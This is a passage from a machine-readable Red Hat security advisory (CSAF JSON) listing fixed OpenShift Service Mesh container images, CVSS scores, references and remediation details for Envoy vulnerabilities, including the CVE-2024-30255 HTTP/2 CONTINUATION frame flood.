"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode"
},
{
"acknowledgments": [
{
"names": [
"Bartek Nowotarski"
],
"organization": "nowotarski.info"
}
],
"cve": "CVE-2024-30255",
"cwe": {
"id": "CWE-390",
"name": "Detection of Error Condition Without Action"
},
"discovery_date": "2024-04-02T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2272986"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in how Envoy Proxy implements the HTTP/2 codec. There are insufficient limitations placed on the amount of CONTINUATION frames that can be sent within a single stream. This issue could allow an unauthenticated remote attacker to send packets to vulnerable servers, which could use up compute resources to cause a Denial of Service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat rates the security impact of this vulnerability as Moderate, in alignment with upstream Envoy. The worst case scenario is excessive CPU utilization causing a denial of service. Once an attack has ended, the system should return to normal operations on its own.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-30255"
},
{
"category": "external",
"summary": "RHBZ#2272986",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2272986"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-30255",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30255"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-30255",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30255"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-j654-3ccm-vfmm",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-j654-3ccm-vfmm"
},
{
"category": "external",
"summary": "https://nowotarski.info/http2-continuation-flood/",
"url": "https://nowotarski.info/http2-continuation-flood/"
},
{
"category": "external",
"summary": "https://www.kb.cert.org/vuls/id/421644",
"url": "https://www.kb.cert.org/vuls/id/421644"
}
],
"release_date": "2024-04-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood"
},
{
"cve": "CVE-2024-32475",
"cwe": {
"id": "CWE-617",
"name": "Reachable Assertion"
},
"discovery_date": "2024-04-19T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2276149"
}
],
"notes": [
{
"category": "description",
